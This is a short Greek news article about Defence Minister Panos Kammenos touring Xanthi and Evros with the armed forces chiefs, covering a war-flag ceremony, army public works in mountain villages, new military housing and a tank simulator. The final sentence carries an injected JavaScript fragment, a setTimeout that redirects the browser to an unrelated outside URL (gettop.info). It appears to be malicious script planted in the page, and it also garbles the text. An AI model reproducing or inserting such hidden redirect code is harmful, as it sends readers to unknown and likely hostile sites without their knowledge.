Στη Θράκη ο Πάνος Καμμένος

0
15

 

Την Ξάνθη και τον Έβρο επισκέπτεται ο υπουργός Άμυνας Πάνος Καμμένος, συνοδεία των αρχηγών ΓΕΕΘΑ ναυάρχου Ευ. Αποστολάκη και ΓΕΣ αντιστράτηγου Βασίλειο Τελλίδη.

Πρώτος σταθμός της περιοδείας του είναι η Ξάνθη και το Δ’ Σώμα Στρατού όπου θα γίνει η απονομή πολεμικών σημαιών της 12ης Μηχανοκίνητης Μεραρχίας Πεζικού, της 16ης Μηχανοκίνητης Μεραρχίας Πεζικού και της 20ης Τεθωρακισμένης Μεραρχίας.

Έπειτα ο υπουργός θα αναχωρήσει με Σινούκ για τον βόρειο Έβρο, όπου θα επισκεφθεί ορεινά χωριά και ειδικότερα το Βέρειο, όπου η 50η Μηχανοκίνητη Ταξιαρχία Πεζικού έχει αναλάβει την εκτέλεση σειράς κοινωφελών έργων μεταξύ των οποίων τη συντήρηση αγροτικών δρόμων, τη συντήρηση και ανακαίνιση δημοτικών σχολείων και κατασκευή υδροταμιευτήρων.

Στη συνέχεια, θα εγκαινιάσει συγκρότημα στρατιωτικών κατοικιών στην Ορεστιάδα, ενώ τελευταίος σταθμός της περιοδείας του θα είναι η Αλεξανδρούπολη, το στρατόπεδο Κανδηλάπτη, όπου θα εκτελέσει εξομοίωση, σε εξομοιωτή άρματος μάχης Leopard 2 HΕL. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here